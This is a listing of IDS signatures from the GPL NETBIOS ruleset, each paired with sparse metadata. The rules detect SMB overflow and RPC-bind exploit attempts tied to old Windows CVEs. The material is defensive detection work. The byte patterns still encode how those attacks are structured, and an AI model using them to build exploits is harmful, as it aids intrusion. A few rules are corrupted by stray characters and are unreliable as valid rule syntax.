alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning unicode attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 02|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103258; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103259

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB IrotIsRunning unicode little endian attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.irot; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|02 00|"; within:2; distance:19; byte_jump:4,8,relative,little,align; byte_test:4,>,1024,0,little; reference:bugtraq,6005; reference:cve,2002-1561; reference:url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx; classtype:protocol-command-decode; sid:2103259; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB IrotIsRunning unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,6005|cve,2002-1561|url,www.microsoft.com/technet/security/bulletin/MS03-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102946

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102946; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102936

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:256,relative; content:!"|00|"; within:256; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102936; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102947

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0C 00|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102947; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102937

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NDdeSetTrustedShareW unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0C|"; within:2; distance:19; isdataat:512,relative; content:!"|00 00|"; within:512; distance:12; reference:bugtraq,11372; reference:cve,2004-0206; classtype:attempted-admin; sid:2102937; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NDdeSetTrustedShareW unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103018

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,!&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; pcre:"/^.{4}/R"; byte_test:4,>,1024,36,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103018; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103020

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB NT Trans NT CREATE unicode oversized Security Descriptor attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|00|"; depth:1; content:"|FF|SMB|A0|"; within:5; distance:3; byte_test:1,&,128,6,relative; pcre:"/^.{27}/R"; content:"|01 00|"; within:2; distance:37; byte_jump:4,-15,little,relative,from_beginning; pcre:"/^.{4}/R"; byte_test:4,>,1024,36,relative,little; reference:cve,2004-1154; classtype:protocol-command-decode; sid:2103020; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB NT Trans NT CREATE unicode oversized Security Descriptor attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2004-1154

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103219

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,1024,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103219; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103218

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,1024,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; reference:url,www.microsoft.com/technet/security/bulletin/MS00-040.mspx; classtype:attempted-admin; sid:2103218; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377|url,www.microsoft.com/technet/security/bulletin/MS00-040.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103221

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|0F 00|"; within:2; distance:19; byte_test:2,>,2048,20,relative,little; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103221; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103220

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB OpenKey unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.winreg; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 0F|"; within:2; distance:19; byte_test:2,>,2048,20,relative; reference:bugtraq,1331; reference:cve,2000-0377; classtype:attempted-admin; sid:2103220; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB OpenKey unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : bugtraq,1331|cve,2000-0377

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103409

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6; classtype:protocol-command-decode; sid:2103409; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103410

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation little endian attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 5C|"; byte_test:4,>,256,6,little; classtype:protocol-command-decode; sid:2103410; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103411

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation unicode attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8; classtype:protocol-command-decode; sid:2103411; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation unicode attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103412

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB RemoteActivation unicode little endian attempt"; flow:established,to_server; flowbits:isset,dce.iactivation.bind; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; content:"|5C 00 5C 00|"; byte_test:4,>,256,8,little; classtype:protocol-command-decode; sid:2103412; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB RemoteActivation unicode little endian attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103240

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103240; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB irot bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103241

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103241; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB irot little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103115

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103115; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103114

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103114; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103117

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103117; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103116

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103116; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103098

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103098; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103090

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|llsrpc|00|"; within:8; distance:78; nocase; classtype:protocol-command-decode; sid:2103090; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103099

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103099; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103160

